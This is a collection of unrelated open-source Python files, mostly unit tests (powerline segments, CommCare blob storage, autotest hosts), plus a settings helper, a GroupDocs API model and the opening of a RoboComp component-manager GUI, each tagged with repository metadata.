        ])
        self.assertEqual(self.vim.file_name(pl=pl, segment_info=segment_info, display_no_file=True, no_file_text='X'), [
            {'contents': 'X', 'highlight_groups': ['file_name_no_file', 'file_name']}
        ])
        with vim_module._with('buffer', '/tmp/abc') as segment_info:
            self.assertEqual(self.vim.file_name(pl=pl, segment_info=segment_info), 'abc')
        with vim_module._with('buffer', '/tmp/’’') as segment_info:
            self.assertEqual(self.vim.file_name(pl=pl, segment_info=segment_info), '’’')
        with vim_module._with('buffer', b'/tmp/\xFF\xFF') as segment_info:
            self.assertEqual(self.vim.file_name(pl=pl, segment_info=segment_info), '<ff><ff>')

    def test_file_size(self):
        pl = Pl()
        segment_info = vim_module._get_segment_info()
        self.assertEqual(self.vim.file_size(pl=pl, segment_info=segment_info), '0 B')
        # 'empty' is a zero-length fixture file next to this test module.
        with vim_module._with('buffer', os.path.join(os.path.dirname(__file__), 'empty')) as segment_info:
            self.assertEqual(self.vim.file_size(pl=pl, segment_info=segment_info), '0 B')

    def test_file_opts(self):
        # file_format / file_encoding / file_type segments.
        pl = Pl()
        segment_info = vim_module._get_segment_info()
        self.assertEqual(self.vim.file_format(pl=pl, segment_info=segment_info), [
            {'divider_highlight_group': 'background:divider', 'contents': 'unix'}
        ])
        self.assertEqual(self.vim.file_encoding(pl=pl, segment_info=segment_info), [
            {'divider_highlight_group': 'background:divider', 'contents': 'utf-8'}
        ])
        self.assertEqual(self.vim.file_type(pl=pl, segment_info=segment_info), None)
        with vim_module._with('bufoptions', filetype='python'):
            self.assertEqual(self.vim.file_type(pl=pl, segment_info=segment_info), [
                {'divider_highlight_group': 'background:divider', 'contents': 'python'}
            ])

    def test_window_title(self):
        pl = Pl()
        segment_info = vim_module._get_segment_info()
        self.assertEqual(self.vim.window_title(pl=pl, segment_info=segment_info), None)
        with vim_module._with('wvars', quickfix_title='Abc'):
            self.assertEqual(self.vim.window_title(pl=pl, segment_info=segment_info), 'Abc')

    def test_line_percent(self):
        pl = Pl()
        segment_info = vim_module._get_segment_info()
        segment_info['buffer'][0:-1] = [str(i) for i in range(100)]
        try:
            self.assertEqual(self.vim.line_percent(pl=pl, segment_info=segment_info), '1')
            vim_module._set_cursor(50, 0)
            self.assertEqual(self.vim.line_percent(pl=pl, segment_info=segment_info), '50')
            self.assertEqual(self.vim.line_percent(pl=pl, segment_info=segment_info, gradient=True), [
                {'contents': '50', 'highlight_groups': ['line_percent_gradient', 'line_percent'], 'gradient_level': 50 * 100.0 / 101}
            ])
        finally:
            vim_module._bw(segment_info['bufnr'])

    def test_line_count(self):
        pl = Pl()
        segment_info = vim_module._get_segment_info()
        segment_info['buffer'][0:-1] = [str(i) for i in range(99)]
        try:
            self.assertEqual(self.vim.line_count(pl=pl, segment_info=segment_info), '100')
            vim_module._set_cursor(50, 0)
            # Line count is independent of cursor position.
            self.assertEqual(self.vim.line_count(pl=pl, segment_info=segment_info), '100')
        finally:
            vim_module._bw(segment_info['bufnr'])

    def test_position(self):
        # position(): percentage plus Top/Bot/All special strings
        # (optionally localized via position_strings).
        pl = Pl()
        segment_info = vim_module._get_segment_info()
        try:
            segment_info['buffer'][0:-1] = [str(i) for i in range(99)]
            vim_module._set_cursor(49, 0)
            self.assertEqual(self.vim.position(pl=pl, segment_info=segment_info), '50%')
            self.assertEqual(self.vim.position(pl=pl, segment_info=segment_info, gradient=True), [
                {'contents': '50%', 'highlight_groups': ['position_gradient', 'position'], 'gradient_level': 50.0}
            ])
            vim_module._set_cursor(0, 0)
            self.assertEqual(self.vim.position(pl=pl, segment_info=segment_info), 'Top')
            vim_module._set_cursor(97, 0)
            self.assertEqual(self.vim.position(pl=pl, segment_info=segment_info, position_strings={'top': 'Comienzo', 'bottom': 'Final', 'all': 'Todo'}), 'Final')
            segment_info['buffer'][0:-1] = [str(i) for i in range(2)]
            vim_module._set_cursor(0, 0)
            self.assertEqual(self.vim.position(pl=pl, segment_info=segment_info, position_strings={'top': 'Comienzo', 'bottom': 'Final', 'all': 'Todo'}), 'Todo')
            self.assertEqual(self.vim.position(pl=pl, segment_info=segment_info, gradient=True), [
                {'contents': 'All', 'highlight_groups': ['position_gradient', 'position'], 'gradient_level': 0.0}
            ])
        finally:
            vim_module._bw(segment_info['bufnr'])

    def test_cursor_current(self):
        pl = Pl()
        segment_info = vim_module._get_segment_info()
        self.assertEqual(self.vim.line_current(pl=pl, segment_info=segment_info), '1')
        self.assertEqual(self.vim.col_current(pl=pl, segment_info=segment_info), '1')
        self.assertEqual(self.vim.virtcol_current(pl=pl, segment_info=segment_info), [{
            'highlight_groups': ['virtcol_current_gradient', 'virtcol_current', 'col_current'], 'contents': '1', 'gradient_level': 100.0 / 80,
        }])
        self.assertEqual(self.vim.virtcol_current(pl=pl, segment_info=segment_info, gradient=False), [{
            'highlight_groups': ['virtcol_current', 'col_current'], 'contents': '1',
        }])

    def test_modified_buffers(self):
        pl = Pl()
        self.assertEqual(self.vim.modified_buffers(pl=pl), None)

    def test_branch(self):
        # branch(): clean/dirty highlight groups and ignore_statuses handling,
        # with the VCS layer fully stubbed out.
        pl = Pl()
        create_watcher = get_fallback_create_watcher()
        branch = partial(self.vim.branch, pl=pl, create_watcher=create_watcher)
        with vim_module._with('buffer', '/foo') as segment_info:
            with replace_attr(self.vcs, 'guess', get_dummy_guess(status=lambda: None)):
                with replace_attr(self.vcs, 'tree_status', lambda repo, pl: None):
                    self.assertEqual(branch(segment_info=segment_info, status_colors=False), [
                        {'divider_highlight_group': 'branch:divider', 'highlight_groups': ['branch'], 'contents': 'foo'}
                    ])
                    self.assertEqual(branch(segment_info=segment_info, status_colors=True), [
                        {'divider_highlight_group': 'branch:divider', 'highlight_groups': ['branch_clean', 'branch'], 'contents': 'foo'}
                    ])
            with replace_attr(self.vcs, 'guess', get_dummy_guess(status=lambda: 'DU')):
                with replace_attr(self.vcs, 'tree_status', lambda repo, pl: 'DU'):
                    self.assertEqual(branch(segment_info=segment_info, status_colors=False), [
                        {'divider_highlight_group': 'branch:divider', 'highlight_groups': ['branch'], 'contents': 'foo'}
                    ])
                    self.assertEqual(branch(segment_info=segment_info, status_colors=True), [
                        {'divider_highlight_group': 'branch:divider', 'highlight_groups': ['branch_dirty', 'branch'], 'contents': 'foo'}
                    ])
            with replace_attr(self.vcs, 'guess', get_dummy_guess(status=lambda: 'U')):
                with replace_attr(self.vcs, 'tree_status', lambda repo, pl: 'U'):
                    self.assertEqual(branch(segment_info=segment_info, status_colors=False, ignore_statuses=['U']), [
                        {'divider_highlight_group': 'branch:divider', 'highlight_groups': ['branch'], 'contents': 'foo'}
                    ])
                    self.assertEqual(branch(segment_info=segment_info, status_colors=True, ignore_statuses=['DU']), [
                        {'divider_highlight_group': 'branch:divider', 'highlight_groups': ['branch_dirty', 'branch'], 'contents': 'foo'}
                    ])
                    self.assertEqual(branch(segment_info=segment_info, status_colors=True), [
                        {'divider_highlight_group': 'branch:divider', 'highlight_groups': ['branch_dirty', 'branch'], 'contents': 'foo'}
                    ])
                    self.assertEqual(branch(segment_info=segment_info, status_colors=True, ignore_statuses=['U']), [
                        {'divider_highlight_group': 'branch:divider', 'highlight_groups': ['branch_clean', 'branch'], 'contents': 'foo'}
                    ])

    def test_file_vcs_status(self):
        pl = Pl()
        create_watcher = get_fallback_create_watcher()
        file_vcs_status = partial(self.vim.file_vcs_status, pl=pl, create_watcher=create_watcher)
        with vim_module._with('buffer', '/foo') as segment_info:
            with replace_attr(self.vim, 'guess', get_dummy_guess(status=lambda file: 'M')):
                self.assertEqual(file_vcs_status(segment_info=segment_info), [
                    {'highlight_groups': ['file_vcs_status_M', 'file_vcs_status'], 'contents': 'M'}
                ])
            with replace_attr(self.vim, 'guess', get_dummy_guess(status=lambda file: None)):
                self.assertEqual(file_vcs_status(segment_info=segment_info), None)
        with vim_module._with('buffer', '/bar') as segment_info:
            # Non-file buffers (buftype=nofile) must not report a VCS status.
            with vim_module._with('bufoptions', buftype='nofile'):
                with replace_attr(self.vim, 'guess', get_dummy_guess(status=lambda file: 'M')):
                    self.assertEqual(file_vcs_status(segment_info=segment_info), None)

    def test_trailing_whitespace(self):
        # Each state is queried twice to exercise the segment's caching.
        pl = Pl()
        with vim_module._with('buffer', 'tws') as segment_info:
            trailing_whitespace = partial(self.vim.trailing_whitespace, pl=pl, segment_info=segment_info)
            self.assertEqual(trailing_whitespace(), None)
            self.assertEqual(trailing_whitespace(), None)
            vim_module.current.buffer[0] = ' '
            self.assertEqual(trailing_whitespace(), [{
                'highlight_groups': ['trailing_whitespace', 'warning'],
                'contents': '1',
            }])
            self.assertEqual(trailing_whitespace(), [{
                'highlight_groups': ['trailing_whitespace', 'warning'],
                'contents': '1',
            }])
            vim_module.current.buffer[0] = ''
            self.assertEqual(trailing_whitespace(), None)
            self.assertEqual(trailing_whitespace(), None)

    def test_tabnr(self):
        pl = Pl()
        segment_info = vim_module._get_segment_info()
        self.assertEqual(self.vim.tabnr(pl=pl, segment_info=segment_info, show_current=True), '1')
        self.assertEqual(self.vim.tabnr(pl=pl, segment_info=segment_info, show_current=False), None)

    def test_tab(self):
        # tab() emits literal %NT / %T tabline labels.
        pl = Pl()
        segment_info = vim_module._get_segment_info()
        self.assertEqual(self.vim.tab(pl=pl, segment_info=segment_info), [{
            'contents': None,
            'literal_contents': (0, '%1T'),
        }])
        self.assertEqual(self.vim.tab(pl=pl, segment_info=segment_info, end=True), [{
            'contents': None,
            'literal_contents': (0, '%T'),
        }])

    def test_bufnr(self):
        pl = Pl()
        segment_info = vim_module._get_segment_info()
        self.assertEqual(self.vim.bufnr(pl=pl, segment_info=segment_info, show_current=True), str(segment_info['bufnr']))
        self.assertEqual(self.vim.bufnr(pl=pl, segment_info=segment_info, show_current=False), None)

    def test_winnr(self):
        pl = Pl()
        segment_info = vim_module._get_segment_info()
        self.assertEqual(self.vim.winnr(pl=pl, segment_info=segment_info, show_current=True), str(segment_info['winnr']))
        self.assertEqual(self.vim.winnr(pl=pl, segment_info=segment_info, show_current=False), None)

    def test_segment_info(self):
        # tab_modified_indicator(): reflects modifications in any buffer of
        # the tab, not just the current one.
        pl = Pl()
        with vim_module._with('tabpage'):
            with vim_module._with('buffer', '1') as segment_info:
                self.assertEqual(self.vim.tab_modified_indicator(pl=pl, segment_info=segment_info), None)
                vim_module.current.buffer[0] = ' '
                self.assertEqual(self.vim.tab_modified_indicator(pl=pl, segment_info=segment_info), [{
                    'contents': '+',
                    'highlight_groups': ['tab_modified_indicator', 'modified_indicator'],
                }])
                vim_module._undo()
                self.assertEqual(self.vim.tab_modified_indicator(pl=pl, segment_info=segment_info), None)
                old_buffer = vim_module.current.buffer
                vim_module._new('2')
                segment_info = vim_module._get_segment_info()
                self.assertEqual(self.vim.tab_modified_indicator(pl=pl, segment_info=segment_info), None)
                old_buffer[0] = ' '
                # The per-buffer indicator stays clear, the per-tab one trips.
                self.assertEqual(self.vim.modified_indicator(pl=pl, segment_info=segment_info), None)
                self.assertEqual(self.vim.tab_modified_indicator(pl=pl, segment_info=segment_info), [{
                    'contents': '+',
                    'highlight_groups': ['tab_modified_indicator', 'modified_indicator'],
                }])

    def test_csv_col_current(self):
        # csv_col_current(): column number/name detection, including
        # multiline quoted fields; the cache is cleared before every call.
        pl = Pl()
        segment_info = vim_module._get_segment_info()

        def csv_col_current(**kwargs):
            self.vim.csv_cache and self.vim.csv_cache.clear()
            return self.vim.csv_col_current(pl=pl, segment_info=segment_info, **kwargs)

        buffer = segment_info['buffer']
        try:
            self.assertEqual(csv_col_current(), None)
            buffer.options['filetype'] = 'csv'
            self.assertEqual(csv_col_current(), None)
            buffer[:] = ['1;2;3', '4;5;6']
            vim_module._set_cursor(1, 1)
            self.assertEqual(csv_col_current(), [{
                'contents': '1', 'highlight_groups': ['csv:column_number', 'csv']
            }])
            vim_module._set_cursor(2, 3)
            self.assertEqual(csv_col_current(), [{
                'contents': '2', 'highlight_groups': ['csv:column_number', 'csv']
            }])
            vim_module._set_cursor(2, 3)
            self.assertEqual(csv_col_current(display_name=True), [{
                'contents': '2', 'highlight_groups': ['csv:column_number', 'csv']
            }, {
                'contents': ' (2)', 'highlight_groups': ['csv:column_name', 'csv']
            }])
            buffer[:0] = ['Foo;Bar;Baz']
            vim_module._set_cursor(2, 3)
            self.assertEqual(csv_col_current(), [{
                'contents': '2', 'highlight_groups': ['csv:column_number', 'csv']
            }, {
                'contents': ' (Bar)', 'highlight_groups': ['csv:column_name', 'csv']
            }])
            if sys.version_info < (2, 7):
                raise SkipTest('csv module in Python-2.6 does not handle multiline csv files well')
            buffer[len(buffer):] = ['1;"bc', 'def', 'ghi', 'jkl";3']
            vim_module._set_cursor(5, 1)
            self.assertEqual(csv_col_current(), [{
                'contents': '2', 'highlight_groups': ['csv:column_number', 'csv']
            }, {
                'contents': ' (Bar)', 'highlight_groups': ['csv:column_name', 'csv']
            }])
            vim_module._set_cursor(7, 6)
            self.assertEqual(csv_col_current(), [{
                'contents': '3', 'highlight_groups': ['csv:column_number', 'csv']
            }, {
                'contents': ' (Baz)', 'highlight_groups': ['csv:column_name', 'csv']
            }])
            self.assertEqual(csv_col_current(name_format=' ({column_name:.1})'), [{
                'contents': '3', 'highlight_groups': ['csv:column_number', 'csv']
            }, {
                'contents': ' (B)', 'highlight_groups': ['csv:column_name', 'csv']
            }])
            self.assertEqual(csv_col_current(display_name=True, name_format=' ({column_name:.1})'), [{
                'contents': '3', 'highlight_groups': ['csv:column_number', 'csv']
            }, {
                'contents': ' (B)', 'highlight_groups': ['csv:column_name', 'csv']
            }])
            self.assertEqual(csv_col_current(display_name=False, name_format=' ({column_name:.1})'), [{
                'contents': '3', 'highlight_groups': ['csv:column_number', 'csv']
            }])
            self.assertEqual(csv_col_current(display_name=False), [{
                'contents': '3', 'highlight_groups': ['csv:column_number', 'csv']
            }])
        finally:
            vim_module._bw(segment_info['bufnr'])

    @classmethod
    def setUpClass(cls):
        # Make the mock 'vim'/'powerline' helpers in tests/path importable
        # ahead of any real installation.
        sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), 'path')))
        from powerline.segments import vim
        cls.vim = vim
        from powerline.segments.common import vcs
        cls.vcs = vcs

    @classmethod
    def tearDownClass(cls):
        # Remove the path inserted by setUpClass().
        sys.path.pop(0)
class TestPDB(TestCase):
    """Tests for the Python-debugger prompt segments (powerline pdb module)."""

    def test_current_line(self):
        pl = Pl()
        frame_info = {'curframe': Args(f_lineno=10)}
        self.assertEqual(pdb.current_line(pl=pl, segment_info=frame_info), '10')

    def test_current_file(self):
        pl = Pl()
        frame_info = {'curframe': Args(f_code=Args(co_filename='/tmp/abc.py'))}
        current_file = partial(pdb.current_file, pl=pl, segment_info=frame_info)
        self.assertEqual(current_file(), 'abc.py')
        self.assertEqual(current_file(basename=True), 'abc.py')
        self.assertEqual(current_file(basename=False), '/tmp/abc.py')

    def test_current_code_name(self):
        pl = Pl()
        frame_info = {'curframe': Args(f_code=Args(co_name='<module>'))}
        self.assertEqual(pdb.current_code_name(pl=pl, segment_info=frame_info), '<module>')

    def test_current_context(self):
        pl = Pl()
        frame_info = {'curframe': Args(f_code=Args(co_name='<module>', co_filename='/tmp/abc.py'))}
        self.assertEqual(pdb.current_context(pl=pl, segment_info=frame_info), 'abc.py')

    def test_stack_depth(self):
        pl = Pl()
        # Three frames on the stack, one of which existed before the debugger
        # started: relative depth is 2, full depth is 3.
        frame_info = {'pdb': Args(stack=[1, 2, 3]), 'initial_stack_length': 1}
        stack_depth = partial(pdb.stack_depth, pl=pl, segment_info=frame_info)
        self.assertEqual(stack_depth(), '2')
        self.assertEqual(stack_depth(full_stack=False), '2')
        self.assertEqual(stack_depth(full_stack=True), '3')
old_cwd = None  # working directory saved here, restored by tearDownModule()


def setUpModule():
    # Run the whole module from the tests directory so relative fixture paths
    # (the 'empty' file, the 'path' mock directory) resolve correctly.
    global old_cwd
    global __file__
    old_cwd = os.getcwd()
    __file__ = os.path.abspath(__file__)
    os.chdir(os.path.dirname(__file__))
def tearDownModule():
    # Restore the working directory changed by setUpModule().
    global old_cwd
    os.chdir(old_cwd)
if __name__ == '__main__':
    # Use the project's test runner rather than unittest.main() directly.
    from tests import main
    main()
| lukw00/powerline | tests/test_segments.py | Python | mit | 75,312 |
from unittest import TestCase
from StringIO import StringIO
from corehq.blobs.atomic import AtomicBlobs
from corehq.blobs.exceptions import InvalidContext, NotFound
from corehq.blobs.tests.util import TemporaryFilesystemBlobDB
class TestFilesystemBlobDB(TestCase):
    """Verify AtomicBlobs commit/rollback semantics on a filesystem blob store."""

    @classmethod
    def setUpClass(cls):
        cls.db = TemporaryFilesystemBlobDB()

    @classmethod
    def tearDownClass(cls):
        cls.db.close()

    def test_put(self):
        # A put inside a successful context is committed.
        with AtomicBlobs(self.db) as atomic:
            blob = atomic.put(StringIO(b"content"))
        with self.db.get(blob.identifier) as blob_file:
            self.assertEqual(blob_file.read(), b"content")

    def test_put_failed(self):
        # A put inside a failing context is rolled back.
        with self.assertRaises(Boom), AtomicBlobs(self.db) as atomic:
            blob = atomic.put(StringIO(b"content"))
            raise Boom()
        with self.assertRaises(NotFound):
            self.db.get(blob.identifier)

    def test_put_outside_context(self):
        # Using the wrapper after its context has exited is an error.
        with AtomicBlobs(self.db) as atomic:
            pass
        with self.assertRaises(InvalidContext):
            atomic.put(StringIO(b"content"))

    def test_delete(self):
        # A delete inside a successful context is committed.
        blob = self.db.put(StringIO(b"content"))
        with AtomicBlobs(self.db) as atomic:
            atomic.delete(blob.identifier)
        with self.assertRaises(NotFound):
            self.db.get(blob.identifier)

    def test_delete_failed(self):
        # A delete inside a failing context is rolled back.
        blob = self.db.put(StringIO(b"content"))
        with self.assertRaises(Boom), AtomicBlobs(self.db) as atomic:
            atomic.delete(blob.identifier)
            raise Boom()
        with self.db.get(blob.identifier) as blob_file:
            self.assertEqual(blob_file.read(), b"content")

    def test_delete_outside_context(self):
        with AtomicBlobs(self.db) as atomic:
            pass
        with self.assertRaises(InvalidContext):
            atomic.delete(StringIO(b"content"))
class Boom(Exception):
    """Marker exception raised deliberately to abort a context in tests."""
| qedsoftware/commcare-hq | corehq/blobs/tests/test_atomic.py | Python | bsd-3-clause | 1,865 |
import csv
import json
class UserSettings(object):
    """Persist user settings in flat files: CSV key/value rows and a JSON document.

    Fixes over the previous revision: the csv module requires *text*-mode
    files in Python 3 (the old code opened them with 'wb'/'rb', which raises
    TypeError), and all file handles are now closed via ``with`` even when an
    exception occurs. The default filenames are unchanged, but each method now
    accepts an optional *filename* for callers that need a different location.
    """

    @staticmethod
    def save_settings(new_settings, filename='settings.csv'):
        """Write the dict *new_settings* as one "key,value" row per entry."""
        # newline='' is required by the csv module so it controls line endings
        # itself (avoids blank rows on Windows).
        with open(filename, 'w', newline='') as f:
            writer = csv.writer(f)
            for key, val in new_settings.items():
                writer.writerow([key, val])

    @staticmethod
    def read_settings(filename='settings.csv'):
        """Read the CSV back into a dict; all values come back as strings."""
        with open(filename, newline='') as f:
            return {key: val for key, val in csv.reader(f)}

    @staticmethod
    def read_json_settings(key="", filename='settings.json'):
        """Return the JSON settings document, or only its *key* entry.

        Returns {} when the file is missing/unreadable or *key* is absent.
        Quirk preserved from the original implementation: if the entry for
        *key* exists but is falsy, the whole document is returned instead.
        """
        try:
            with open(filename, 'r') as f:
                file_vals = json.load(f)
        except (IOError, ValueError) as err:
            # IOError covers a missing file; ValueError covers corrupt JSON.
            print('Error while reading json file data:', err)
            return {}
        if not key:
            return file_vals
        try:
            if file_vals[key]:
                return file_vals[key]
            return file_vals
        except KeyError as err:
            print('Error while reading json file data:', err)
            return {}

    @staticmethod
    def save_json_settings(settings, key, filename='settings.json'):
        """Store *settings* under *key*, preserving other keys. Returns None."""
        file_vals = UserSettings.read_json_settings(filename=filename) or {}
        file_vals[key] = settings
        with open(filename, 'w') as f:
            json.dump(file_vals, f)
        return None
| valuko/team_st33ve | settings.py | Python | mit | 1,207 |
#!/usr/bin/python
import unittest
import common
from autotest_lib.client.common_lib import error, utils
from autotest_lib.client.common_lib.test_utils import mock
from autotest_lib.client.common_lib.hosts import base_classes
class test_host_class(unittest.TestCase):
    """Unit tests for hosts.base_classes.Host."""

    def setUp(self):
        self.god = mock.mock_god()

    def tearDown(self):
        self.god.unstub_all()

    def test_run_output_notimplemented(self):
        # The abstract base class must not provide run_output().
        host = base_classes.Host()
        self.assertRaises(NotImplementedError, host.run_output, "fake command")

    def test_check_diskspace(self):
        self.god.stub_function(base_classes.Host, 'run')
        host = base_classes.Host()
        host.hostname = 'unittest-host'
        df_tail = ('/dev/sda1 1061 939'
                   ' 123 89% /')
        df_result = utils.CmdResult(exit_status=0, stdout=df_tail)
        # 123 MB free: below a 0.2 GB requirement, above a 0.1 GB one.
        host.run.expect_call('df -PB 1000000 /foo | tail -1').and_return(df_result)
        self.assertRaises(error.AutoservDiskFullHostError,
                          host.check_diskspace, '/foo', 0.2)
        host.run.expect_call('df -PB 1000000 /foo | tail -1').and_return(df_result)
        host.check_diskspace('/foo', 0.1)
        self.god.check_playback()
unittest.main()
| wuzhy/autotest | client/common_lib/hosts/base_classes_unittest.py | Python | gpl-2.0 | 1,372 |
#!/usr/bin/env python
"""
Copyright 2012 GroupDocs.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
class TemplateFieldsResponse:
    """Response model for the GroupDocs "template fields" API call.

    Auto-generated-model style class (originally produced by the swagger code
    generator): ``swaggerTypes`` maps each attribute name to the type name the
    API client uses for (de)serialization, and every attribute starts as None
    until the client populates it.
    """

    def __init__(self):
        # Attribute name -> swagger type name, consumed by the API client.
        self.swaggerTypes = {
            'result': 'TemplateFieldsResult',
            'status': 'str',
            'error_message': 'str',
            'composedOn': 'int',
        }
        self.result = None
        self.status = None
        self.error_message = None
        self.composedOn = None
| liosha2007/temporary-groupdocs-python3-sdk | groupdocs/models/TemplateFieldsResponse.py | Python | apache-2.0 | 1,158 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# -----------------------
# ----- rcmanager -----
# -----------------------
# An ICE component manager.
#
# Copyright (C) 2009-2015 by RoboLab - University of Extremadura
#
# This file is part of RoboComp
#
# RoboComp is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# RoboComp is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with RoboComp. If not, see <http://www.gnu.org/licenses/>.
#
#
#
# CODE BEGINS
#
import argparse
import sys, time, traceback, os, math, random, threading, time
import Ice
from PySide2 import QtCore, QtGui, QtWidgets
from ui_formManagerSimple import Ui_Form
import rcmanagerConfigSimple
# Single shared Ice communicator used for every proxy the manager creates.
global_ic = Ice.initialize(sys.argv)

# Ctrl+c handling
import signal
# Restore the default SIGINT handler so Ctrl+C terminates the Qt application
# instead of being swallowed by the event loop.
signal.signal(signal.SIGINT, signal.SIG_DFL)

# NOTE(review): 'dict' shadows the builtin; it holds rcmanager default values.
dict = rcmanagerConfigSimple.getDefaultValues()

initDir = os.getcwd()  # directory the tool was launched from
sys.path.append('.')
sys.path.append('/opt/robocomp/bin')

import rcmanagerEditorSimple
# CommandDialog class: It's the dialog sending "up()/down() component X signal to the main
class CommandDialog(QtWidgets.QWidget):
    """Per-component action panel: four stacked buttons re-emitted as Qt signals.

    The dialog performs no actions itself; the owner connects to the signals.
    """

    # Signals forwarded to whoever owns this dialog.
    up = QtCore.Signal()
    down = QtCore.Signal()
    restart = QtCore.Signal()
    config = QtCore.Signal()

    def __init__(self, parent, x, y):
        # Place the widget at (x, y) inside *parent*.
        QtWidgets.QWidget.__init__(self)
        self.setParent(parent)
        # NOTE(review): the widget is 75 px tall but holds four 25 px buttons
        # (100 px total) -- the last button may be clipped; confirm intended.
        self.setGeometry(x, y, 100, 75)
        self.button1 = QtWidgets.QPushButton(self)
        self.button1.setGeometry(0, 0, 100, 25)
        self.button1.setText('up')
        self.button2 = QtWidgets.QPushButton(self)
        self.button2.setGeometry(0, 25, 100, 25)
        self.button2.setText('down')
        self.button3 = QtWidgets.QPushButton(self)
        self.button3.setGeometry(0, 50, 100, 25)
        self.button3.setText("restart")
        self.button4 = QtWidgets.QPushButton(self)
        self.button4.setGeometry(0, 75, 100, 25)
        self.button4.setText('edit config')
        # NOTE(review): old-style QObject.connect(SIGNAL(...)) is legacy Qt
        # API -- verify it is still accepted by the PySide2 version in use.
        self.connect(self.button1, QtCore.SIGNAL('clicked()'), self.but1)
        self.connect(self.button2, QtCore.SIGNAL('clicked()'), self.but2)
        self.connect(self.button3, QtCore.SIGNAL('clicked()'), self.but3)
        self.connect(self.button4, QtCore.SIGNAL('clicked()'), self.but4)
        self.show()

    # Button handlers: forward each click as the matching class signal.
    def but1(self): self.up.emit()
    def but2(self): self.down.emit()
    def but3(self): self.restart.emit()
    def but4(self): self.config.emit()
# ComponentChecker class: Threaded endpoint-pinging class.
class ComponentChecker(threading.Thread):
    """Daemon thread that pings an Ice endpoint twice per second.

    The liveness flag is guarded by a recursive QMutex so the GUI thread can
    poll isalive() safely while the worker thread updates it.
    """

    def __init__(self, endpoint):
        """Create a checker for *endpoint* (an Ice proxy string).

        Raises (after printing a diagnostic) when the proxy cannot be created,
        e.g. for an empty or malformed endpoint string.
        """
        threading.Thread.__init__(self)
        self.mutex = QtCore.QMutex(QtCore.QMutex.Recursive)
        self.daemon = True
        self.reset()
        self.exit = False
        self.alive = False
        self.aPrx = None
        try:
            self.aPrx = global_ic.stringToProxy(endpoint)
            # Ice proxies are immutable: ice_timeout() returns a NEW proxy
            # with the timeout applied. The previous code discarded the return
            # value, so no timeout was ever in effect. The argument is in
            # milliseconds; 1000 ms makes pings fail fast on dead endpoints.
            self.aPrx = self.aPrx.ice_timeout(1000)
        except Exception:
            print("Error creating proxy to " + endpoint)
            if len(endpoint) == 0:
                print('Please, provide an endpoint')
            raise

    def run(self):
        """Ping loop: refresh the shared 'alive' flag every 0.5 s until stop()."""
        while not self.exit:
            try:
                self.aPrx.ice_ping()
                is_up = True
            except Exception:
                is_up = False
            self.mutex.lock()
            self.alive = is_up
            self.mutex.unlock()
            time.sleep(0.5)

    def reset(self):
        """Mark the component as not alive (until the next successful ping)."""
        self.mutex.lock()
        self.alive = False
        self.mutex.unlock()

    def isalive(self):
        """Thread-safe read of the last ping result."""
        self.mutex.lock()
        r = self.alive
        self.mutex.unlock()
        return r

    def stop(self):
        """Ask the ping loop to finish; the thread exits after its current sleep."""
        self.exit = True

    def runrun(self):
        """Start the ping thread if it is not already running."""
        # Thread.isAlive() was removed in Python 3.9; is_alive() is the
        # supported spelling on every Python 3 version.
        if not self.is_alive():
            self.start()
#
# Application main class.
#
class TheThing(QtWidgets.QDialog):
    def __init__(self):
        """Build the main rcmanager dialog: graph canvas, menus, timers,
        tray icon and all signal wiring, then restore saved settings."""
        # Create a component checker
        self.componentChecker = {}
        self.configFile = os.path.expanduser('~/rcmanager.xml')
        # Gui config
        global dict
        QtWidgets.QDialog.__init__(self)
        self.root = '/opt/robocomp/'
        self.ui = Ui_Form()
        self.ui.setupUi(self)
        # Embedded graph view drawing the component dependency graph.
        self.canvas = GraphView(self.ui.graphTab)
        self.canvas.setGeometry(0, 0, 531, 581)
        self.canvas.show()
        # Two timers drive the graph layout simulation: a slow idle timer
        # and a fast one used right after the user drags a node.
        self.canvasTimer = QtCore.QTimer()
        self.canvasFastTimer = QtCore.QTimer()
        self.connect(self.canvas, QtCore.SIGNAL("nodeReleased()"), self.setFastState)
        self.setFastState(True)
        self.connect(self.canvasTimer, QtCore.SIGNAL("timeout()"), self.graphUpdate)
        self.connect(self.canvasFastTimer, QtCore.SIGNAL("timeout()"), self.graphFastEnds)
        if dict['dock'] == 'true':
            self.changeDock()
        # Variables needed to switch the state of components when double-clicking over them.
        self.clickTimes = 0
        self.lastClickTime = QtCore.QTime()
        self.clickNumber = -1
        # Component config containter
        self.compConfig = []
        # Init component sets
        self.back_comps = set()
        self.requests = set()
        # Icon and system's tray stuff
        self.iconOK = QtGui.QIcon(QtGui.QPixmap('/opt/robocomp/share/rcmanager/drawing_red.png'))
        self.iconFULL = QtGui.QIcon(QtGui.QPixmap('/opt/robocomp/share/rcmanager/drawing_green.png'))
        self.iconChange1 = QtGui.QIcon(QtGui.QPixmap('/opt/robocomp/share/rcmanager/drawing_right.png'))
        self.iconChange2 = QtGui.QIcon(QtGui.QPixmap('/opt/robocomp/share/rcmanager/drawing_left.png'))
        self.setWindowIcon(self.iconOK)
        self.state = 0
        self.doExit = False
        self.systray = None
        self.blinkTimer = QtCore.QTimer()
        self.doDock = False
        # Set the fixed timeout for component checking
        self.timer = QtCore.QTimer()
        self.timer.start(dict['fixed'])
        # Menu bar (File / Simulation / Actions) inserted above the tabs.
        self.menu = QtWidgets.QMenuBar(None)
        self.ui.verticalLayout_3.insertWidget(0, self.menu)
        self.menuFile = self.menu.addMenu('File')
        self.menuSim = self.menu.addMenu('Simulation')
        self.menuActions = self.menu.addMenu('Actions')
        self.actionKillAll = self.menuActions.addAction('kill all')
        self.connect(self.actionKillAll, QtCore.SIGNAL("triggered(bool)"), self.killall)
        #self.actionRunAll = self.menuActions.addAction('run all')
        #self.connect(self.actionRunAll, QtCore.SIGNAL("triggered(bool)"), self.runall)
